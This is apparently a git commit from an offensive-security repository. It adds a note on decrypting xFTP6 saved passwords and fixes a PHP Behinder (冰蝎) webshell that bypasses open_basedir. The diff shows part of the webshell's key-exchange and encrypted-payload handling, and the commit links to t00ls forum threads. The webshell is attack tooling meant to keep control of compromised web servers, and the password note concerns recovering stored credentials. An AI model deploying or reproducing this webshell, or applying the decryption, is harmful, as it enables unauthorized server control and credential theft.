add xFTP6密码解密.md&fix 冰蝎bypass_open_basedir_shell

This commit is contained in:
Mrxn
2020-05-10 00:20:03 +08:00
parent 91c916e8df
commit fd88c5af85
2 changed files with 21 additions and 2 deletions
+4 -2
View File
@@ -45,7 +45,7 @@ if (isset($_GET['pass']))
$_SESSION['k']=$key;
print $key;
}
else
else if (!empty($_SESSION['k']))
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input").'';
@@ -71,6 +71,8 @@ else
```
### 原帖:https://www.t00ls.net/thread-56301-1-1.html
### 原帖:https://www.t00ls.net/thread-56301-1-1.html
### 参考:https://www.t00ls.net/thread-56337-1-1.html
### 欢迎大家前往土司投稿!